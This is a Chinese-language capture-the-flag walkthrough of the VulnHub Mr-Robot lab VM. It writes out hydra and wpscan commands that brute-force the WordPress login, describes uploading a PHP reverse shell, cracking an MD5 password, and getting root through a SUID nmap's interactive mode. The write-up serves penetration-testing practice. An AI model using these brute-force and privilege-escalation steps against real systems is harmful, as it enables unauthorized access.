官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
靶机地址:https://www.vulnhub.com/entry/mr-robot-1,151/
靶机难度:中级(CTF)
靶机发布日期:2016年6月28日
靶机描述:根据表演,机器人先生。
此VM具有隐藏在不同位置的三个键。您的目标是找到全部三个。每个密钥逐渐难以找到。
VM不太困难。没有任何高级开发或逆向工程。该级别被认为是初学者-中级。
目标:得到root权限&找到key1~3
作者:DXR嗯嗯呐
信息收集
nmap扫描靶机IP
nmap扫描靶机端口
22 ssh 关闭状态
80 http
443 https
dirb扫描发现robots.txt文件
访问,发现两个文件
获得第一个key
Fsocity.dic里面很多字符,应该是个字典表
dirb扫描是发现过wordpress登陆界面,随便登陆一下
报错显示:无效的用户名
如果这样的报错,可以使用刚刚得到的字典表,在BurpSuite爆破一下账号。
也可以通过hydra爆破账号
hydra -L fsocity.txt -p test 192.168.16.146 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:Invalid username"
找到账号elliot,在爆破一下密码
wpscan --url http://192.168.16.146/wp-login.php-U elliot -P fsocity.txt --api-token 'xxx'
Username: elliot
Password: ER28-0652
getshell
在这里找到了一个文件上传点,测试一下
在media模块下找到上传的shell,并找到目录
我是使用的kail自带的/usr/share/webshells/php/php-reverse-shell.php反弹shell
提权
用了几个内核漏洞的poc都不行,去home目录看到robot目录可以进去
看一下 password.raw-md5文件
发现md5加密的robot密码
解码获得robot/abcdefghijklmnopqrstuvwxyz
su跳转至robot用户
找到了第二个key
find / -perm -4000 2>/dev/null
发现nmap具备SID权限
看一下nmap版本
较旧版本的Nmap(2.02至5.21)具有交互模式,允许用户执行shell命令。
nmap --interactive
!sh 启动shell,获得root权限
找到key3
完成!!!
总结
好几天没打靶机,手生了,懈怠了。赶紧捡起来。
1、nmap扫描搏击端口,dirb扫描,发现robots.txt文件。在robots.txt发现key1和一个字段文件。
2、hydra爆破wordpress账号密码,登陆上传shell。
3、在robot目录找到robot账号的md5加密的密码,破解后获得密码。登陆robot用户。
4、find / -perm -4000 2>/dev/null 发现nmap具备SID权限,nmap2.02-5.21版本具备交互模式,可以通过--interactive获得交换界面。!sh获得root交换shell。